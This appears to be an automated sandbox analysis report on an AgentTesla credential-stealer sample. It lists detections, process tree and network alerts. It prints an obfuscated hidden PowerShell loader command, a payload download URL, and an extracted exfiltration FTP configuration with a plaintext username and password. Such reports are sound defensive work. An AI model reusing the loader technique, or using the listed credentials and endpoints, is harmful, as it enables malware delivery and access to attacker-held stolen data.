Edit tour

Windows Analysis Report
Amalgamers.exe

Overview

General Information

Sample name:	Amalgamers.exe
Analysis ID:	1552876
MD5:	e2a5b947ac8266e79cc0c9faff051849
SHA1:	a128aac0de4bbf879f7df28526e6b59a30fb82b1
SHA256:	b5276a247be390e58bbb52535b1437f1aae13ca70930ce885c8aad870ba01053
Tags:	exeHUNuser-smica83
Infos:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Early bird code injection technique detected

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AgentTesla

AI detected suspicious sample

Found suspicious powershell code related to unpacking or dynamic code loading

Loading BitLocker PowerShell Module

Powershell drops PE file

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Queues an APC in another process (thread injection)

Suspicious powershell command line found

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Abnormal high CPU Usage

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sigma detected: Msiexec Initiated Connection

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses FTP

Uses a known web browser user agent for HTTP communication

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

Amalgamers.exe (PID: 7148 cmdline: "C:\Users\user\Desktop\Amalgamers.exe" MD5: E2A5B947AC8266E79CC0C9FAFF051849)

powershell.exe (PID: 6428 cmdline: powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msiexec.exe (PID: 600 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "FTP", "Host": "ftp://ftp.carbognin.it", "Username": "server@carbognin.it", "Password": "59Cif8wZUH#X"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000006.00000002.2891546582.0000000023F71000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.2891546582.0000000023F71000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: msiexec.exe PID: 600	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: msiexec.exe PID: 600	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security

Sigma Signatures

System Summary

Sigma detected: Msiexec Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 185.36.171.17, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 600, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49797

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6428, TargetFilename: C:\Users\user\AppData\Local\Reglements216\Fessewise\Amalgamers.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) ", CommandLine: powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Amalgamers.exe", ParentImage: C:\Users\user\Desktop\Amalgamers.exe, ParentProcessId: 7148, ParentProcessName: Amalgamers.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) ", ProcessId: 6428, ProcessName: powershell.exe

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-09T20:46:13.669638+0100	2022930	1	A Network Trojan was detected	4.245.163.56	443	192.168.2.4	49730	TCP
2024-11-09T20:46:52.578190+0100	2022930	1	A Network Trojan was detected	4.245.163.56	443	192.168.2.4	49736	TCP

ET MALWARE AgentTesla Exfil via FTP

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-09T20:47:13.762981+0100	2029927	1	A Network Trojan was detected	192.168.2.4	49819	86.107.36.93	21	TCP

ETPRO MALWARE Agent Tesla CnC Exfil Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-09T20:47:14.515003+0100	2855542	1	A Network Trojan was detected	192.168.2.4	49835	86.107.36.93	35643	TCP
2024-11-09T20:47:14.520299+0100	2855542	1	A Network Trojan was detected	192.168.2.4	49835	86.107.36.93	35643	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-09T20:47:08.054416+0100	2803270	2	Potentially Bad Traffic	192.168.2.4	49797	185.36.171.17	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: msiexec.exe.600.6.memstrmin

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.carbognin.it", "Username": "server@carbognin.it", "Password": "59Cif8wZUH#X"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Reglements216\Fessewise\Amalgamers.exe

ReversingLabs: Detection: 57%

Multi AV Scanner detection for submitted file

Source: Amalgamers.exe

ReversingLabs: Detection: 57%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 94.8% probability

Source: Amalgamers.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 185.36.171.17:443 -> 192.168.2.4:49803 version: TLS 1.2

Source: Amalgamers.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\Amalgamers.exe	Code function: 0_2_004062A3 FindFirstFileA,FindClose,	0_2_004062A3
Source: C:\Users\user\Desktop\Amalgamers.exe	Code function: 0_2_00405768 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_00405768
Source: C:\Users\user\Desktop\Amalgamers.exe	Code function: 0_2_004026FE FindFirstFileA,	0_2_004026FE

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49835 -> 86.107.36.93:35643
Source: Network traffic	Suricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.4:49819 -> 86.107.36.93:21

Source: global traffic

TCP traffic: 192.168.2.4:49835 -> 86.107.36.93:35643

Source: Joe Sandbox View

IP Address: 86.107.36.93 86.107.36.93

Source: Joe Sandbox View

ASN Name: DIALTELECOMRO DIALTELECOMRO

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49797 -> 185.36.171.17:80
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.4:49730
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.4:49736

Source: unknown

FTP traffic detected: 86.107.36.93:21 -> 192.168.2.4:49819 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 80 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 80 allowed.220-Local time is now 20:46. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 80 allowed.220-Local time is now 20:46. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 80 allowed.220-Local time is now 20:46. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 2 of 80 allowed.220-Local time is now 20:46. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.

Source: global traffic	HTTP traffic detected: GET //CNDKMREh44.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: abreo.plConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET //CNDKMREh44.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: abreo.plCache-Control: no-cache

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET //CNDKMREh44.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: abreo.plConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET //CNDKMREh44.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: abreo.plCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: abreo.pl
Source: global traffic	DNS traffic detected: DNS query: ftp.carbognin.it

Source: msiexec.exe, 00000006.00000002.2878965092.000000000855C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2888745995.0000000023600000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://abreo.pl//CNDKMREh44.bin
Source: msiexec.exe, 00000006.00000002.2878965092.000000000855C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://abreo.pl//CNDKMREh44.bina
Source: msiexec.exe, 00000006.00000002.2891546582.0000000023FCC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2891546582.0000000023F71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ftp.carbognin.it
Source: Amalgamers.exe, Amalgamers.exe.1.dr	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: Amalgamers.exe, Amalgamers.exe.1.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: msiexec.exe, 00000006.00000002.2891546582.0000000023F71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: msiexec.exe, 00000006.00000002.2878965092.000000000851A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://abreo.pl/
Source: msiexec.exe, 00000006.00000002.2878965092.0000000008543000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://abreo.pl//CNDKMREh44.bin
Source: msiexec.exe, 00000006.00000002.2878965092.0000000008543000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://abreo.pl//CNDKMREh44.bincq

Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803

Source: unknown

HTTPS traffic detected: 185.36.171.17:443 -> 192.168.2.4:49803 version: TLS 1.2

Source: C:\Users\user\Desktop\Amalgamers.exe

Code function: 0_2_00405205 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00405205

System Summary

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Reglements216\Fessewise\Amalgamers.exe

Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\Amalgamers.exe

Code function: 0_2_0040320C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_0040320C

Source: C:\Users\user\Desktop\Amalgamers.exe	Code function: 0_2_00404A44	0_2_00404A44
Source: C:\Users\user\Desktop\Amalgamers.exe	Code function: 0_2_00406F54	0_2_00406F54
Source: C:\Users\user\Desktop\Amalgamers.exe	Code function: 0_2_0040677D	0_2_0040677D
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_02CC4A58	6_2_02CC4A58
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_02CCD220	6_2_02CCD220
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_02CC4188	6_2_02CC4188
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_02CC9BC8	6_2_02CC9BC8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_02CC3E40	6_2_02CC3E40
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_02CCD21A	6_2_02CCD21A

Source: Amalgamers.exe

Static PE information: invalid certificate

Source: Amalgamers.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/17@2/2

Source: C:\Users\user\Desktop\Amalgamers.exe

0_2_0040320C

Source: C:\Users\user\Desktop\Amalgamers.exe

Code function: 0_2_004044D1 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_004044D1

Source: C:\Users\user\Desktop\Amalgamers.exe

Code function: 0_2_004020D1 CoCreateInstance,MultiByteToWideChar,

0_2_004020D1

Source: C:\Users\user\Desktop\Amalgamers.exe

File created: C:\Users\user\AppData\Local\Reglements216

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6476:120:WilError_03

Source: C:\Users\user\Desktop\Amalgamers.exe

File created: C:\Users\user\AppData\Local\Temp\nss473C.tmp

Jump to behavior

Source: Amalgamers.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
Source: C:\Windows\SysWOW64\msiexec.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\SysWOW64\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\Amalgamers.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Amalgamers.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Amalgamers.exe

ReversingLabs: Detection: 57%

Source: C:\Users\user\Desktop\Amalgamers.exe

File read: C:\Users\user\Desktop\Amalgamers.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Amalgamers.exe "C:\Users\user\Desktop\Amalgamers.exe"
Source: C:\Users\user\Desktop\Amalgamers.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) "
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
Source: C:\Users\user\Desktop\Amalgamers.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Defektes=Get-Content -Raw 'C:\Users\user\AppData\Local\Reglements216\Akhoond106.Iml';$Dermoosseous=$Defektes.SubString(55328,3);.$Dermoosseous($Defektes) "	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Amalgamers.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Amalgamers.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Amalgamers.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Amalgamers.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Amalgamers.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Amalgamers.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Amalgamers.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Amalgamers.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Amalgamers.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Amalgamers.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\Amalgamers.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Amalgamers.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Amalgamers.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Amalgamers.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\Amalgamers.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\Amalgamers.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\Amalgamers.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\Amalgamers.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\Amalgamers.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Amalgamers.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Amalgamers.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Amalgamers.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Amalgamers.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasadhlp.dll	Jump to behavior
